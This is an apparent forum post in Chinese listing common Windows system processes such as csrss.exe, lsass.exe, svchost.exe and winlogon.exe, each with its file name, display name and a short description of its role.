<DIV class=tpc_content id=read_502>系統(tǒng)進程信息<BR><BR>[system process] - [system process] - 進程信息<BR>進程文件: [system process] or [system process]<BR>進程名稱: Windows內(nèi)存處理系統(tǒng)進程<BR>描述: Windows頁面內(nèi)存管理進程，擁有0級優(yōu)先。<BR><BR><BR>alg - alg.exe - 進程信息<BR>進程文件: alg or alg.exe<BR>進程名稱: 應用層網(wǎng)關服務<BR>描述: 這是一個應用層網(wǎng)關服務用于網(wǎng)絡共享。<BR><BR><BR>csrss - csrss.exe - 進程信息<BR>進程文件: csrss or csrss.exe<BR>進程名稱: Client/Server Runtime Server Subsystem<BR>描述: 客戶端服務子系統(tǒng)，用以控制Windows圖形相關子系統(tǒng)。<BR><BR><BR>ddhelp - ddhelp.exe - 進程信息<BR>進程文件: ddhelp or ddhelp.exe<BR>進程名稱: DirectDraw Helper<BR>描述: DirectDraw Helper是DirectX這個用于圖形服務的一個組成部分。<BR><BR><BR>dllhost - dllhost.exe - 進程信息<BR>進程文件: dllhost or dllhost.exe<BR>進程名稱: DCOM DLL Host進程<BR>描述: DCOM DLL Host進程支持基于COM對象支持DLL以運行Windows程序。<BR><BR><BR>explorer - explorer.exe - 進程信息<BR>進程文件: explorer or explorer.exe<BR>進程名稱: 程序管理<BR>描述: Windows Program Manager或者Windows Explorer用于控制Windows圖形Shell，包括開始菜單、任務欄，桌面和文件管理。<BR><BR><BR>inetinfo - inetinfo.exe - 進程信息<BR>進程文件: inetinfo or inetinfo.exe<BR>進程名稱: IIS Admin Service Helper<BR>描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分，用于Debug調(diào)試除錯。<BR><BR><BR>internat - internat.exe - 進程信息<BR>進程文件: internat or internat.exe<BR>進程名稱: Input Locales<BR>描述: 這個輸入控制圖標用于更改類似國家設置、鍵盤類型和日期格式。<BR><BR><BR>kernel32 - kernel32.dll - 進程信息<BR>進程文件: kernel32 or kernel32.dll<BR>進程名稱: Windows殼進程<BR>描述: Windows殼進程用于管理多線程、內(nèi)存和資源。<BR><BR><BR>lsass - lsass.exe - 進程信息<BR>進程文件: lsass or lsass.exe<BR>進程名稱: 本地安全權限服務<BR>描述: 這個本地安全權限服務控制Windows安全機制。<BR><BR><BR>mdm - mdm.exe - 進程信息<BR>進程文件: mdm or mdm.exe<BR>進程名稱: Machine Debug Manager<BR>描述: Debug除錯管理用于調(diào)試應用程序和Microsoft Office中的Microsoft script Editor腳本編輯器。<BR><BR><BR>mmtask - mmtask.tsk - 進程信息<BR>進程文件: mmtask or mmtask.tsk<BR>進程名稱: 多媒體支持進程<BR>描述: 這個Windows多媒體后臺程序控制多媒體服務，例如MIDI。<BR><BR><BR>mprexe - mprexe.exe - 進程信息<BR>進程文件: mprexe or mprexe.exe<BR>進程名稱: Windows路由進程<BR>描述: Windows路由進程包括向適當?shù)木W(wǎng)絡部分發(fā)出網(wǎng)絡請求。<BR><BR><BR>msgsrv32 - msgsrv32.exe - 進程信息<BR>進程文件: msgsrv32 or msgsrv32.exe<BR>進程名稱: Windows信使服務<BR>描述: Windows信使服務調(diào)用Windows驅(qū)動和程序管理在啟動。<BR><BR><BR>mstask - mstask.exe - 進程信息<BR>進程文件: mstask or mstask.exe<BR>進程名稱: Windows計劃任務<BR>描述: Windows計劃任務用于設定繼承在什么時間或者什么日期備份或者運行。<BR><BR><BR>regsvc - regsvc.exe - 進程信息<BR>進程文件: regsvc or regsvc.exe<BR>進程名稱: 遠程注冊表服務<BR>描述: 遠程注冊表服務用于訪問在遠程計算機的注冊表。<BR><BR><BR>rpcss - rpcss.exe - 進程信息<BR>進程文件: rpcss or rpcss.exe<BR>進程名稱: RPC Portmapper<BR>描述: Windows 的RPC端口映射進程處理RPC調(diào)用(遠程模塊調(diào)用)然后把它們映射給指定的服務提供者。<BR><BR><BR>services - services.exe - 進程信息<BR>進程文件: services or services.exe<BR>進程名稱: Windows Service Controller<BR>描述: 管理Windows服務。<BR><BR><BR>smss - smss.exe - 進程信息<BR>進程文件: smss or smss.exe<BR>進程名稱: Session Manager Subsystem<BR>描述: 該進程為會話管理子系統(tǒng)用以初始化系統(tǒng)變量，MS-DOS驅(qū)動名稱類似LPT1以及COM，調(diào)用Win32殼子系統(tǒng)和運行在Windows登陸過程。<BR><BR><BR>snmp - snmp.exe - 進程信息<BR>進程文件: snmp or snmp.exe<BR>進程名稱: Microsoft SNMP Agent<BR>描述: Windows簡單的網(wǎng)絡協(xié)議代理（SNMP）用于監(jiān)聽和發(fā)送請求到適當?shù)木W(wǎng)絡部分。<BR><BR><BR>spool32 - spool32.exe - 進程信息<BR>進程文件: spool32 or spool32.exe<BR>進程名稱: Printer Spooler<BR>描述: Windows打印任務控制程序，用以打印機就緒。<BR><BR><BR>spoolsv - spoolsv.exe - 進程信息<BR>進程文件: spoolsv or spoolsv.exe<BR>進程名稱: Printer Spooler Service<BR>描述: Windows打印任務控制程序，用以打印機就緒。<BR><BR><BR>stisvc - stisvc.exe - 進程信息<BR>進程文件: stisvc or stisvc.exe<BR>進程名稱: Still Image Service<BR>描述: Still Image Service用于控制掃描儀和數(shù)碼相機連接在Windows。<BR><BR><BR>svchost - svchost.exe - 進程信息<BR>進程文件: svchost or svchost.exe<BR>進程名稱: Service Host Process<BR>描述: Service Host Process是一個標準的動態(tài)連接庫主機處理服務。<BR><BR><BR>system - system - 進程信息<BR>進程文件: system or system<BR>進程名稱: Windows System Process<BR>描述: Microsoft Windows系統(tǒng)進程。<BR><BR><BR>taskmon - taskmon.exe - 進程信息<BR>進程文件: taskmon or taskmon.exe<BR>進程名稱: Windows Task Optimizer<BR>描述: windows任務優(yōu)化器監(jiān)視你使用某個程序的頻率，并且通過加載那些經(jīng)常使用的程序來整理優(yōu)化硬盤。 <BR><BR><BR>tcpsvcs - tcpsvcs.exe - 進程信息<BR>進程文件: tcpsvcs or tcpsvcs.exe<BR>進程名稱: TCP/IP Services<BR>描述: TCP/IP Services Application支持透過TCP/IP連接局域網(wǎng)和Internet。<BR><BR><BR>winlogon - winlogon.exe - 進程信息<BR>進程文件: winlogon or winlogon.exe<BR>進程名稱: Windows Logon Process<BR>描述: Windows NT用戶登陸程序。<BR><BR><BR>winmgmt - winmgmt.exe - 進程信息<BR>進程文件: winmgmt or winmgmt.exe<BR>進程名稱: Windows Management Service<BR>描述: Windows Management Service透過Windows Management Instrumentation data (WMI)技術處理來自應用客戶端的請求</DIV>